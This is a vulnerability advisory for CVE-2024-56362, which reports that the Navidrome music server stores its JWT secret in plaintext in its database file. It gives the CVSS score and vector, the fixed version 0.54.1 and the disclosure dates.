CVE-2024-56362 HIGH

CVE-2024-56362: Navidrome Stores JWT Secret in Plaintext in navidrome.db

Vendor Navidrome
Product navidrome
Weakness CWE-312 · Cleartext storage
Published December 23, 2024
Last update December 24, 2024

CVSS base score

7.1/10
Attack vector Local
Attack complexity Low
Privileges required Low
User interaction None
Confidentiality High
Integrity High

CVSS vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

What the vulnerability does

01Description

Navidrome is an open source web-based music collection server and streamer. Navidrome stores the JWT secret in plaintext in the navidrome.db database file under the property table. This practice introduces a security risk because anyone with access to the database file can retrieve the secret. This vulnerability is fixed in 0.54.1.

Key dates

02Disclosure timeline

December 23, 2024 CVE published
December 24, 2024 Record updated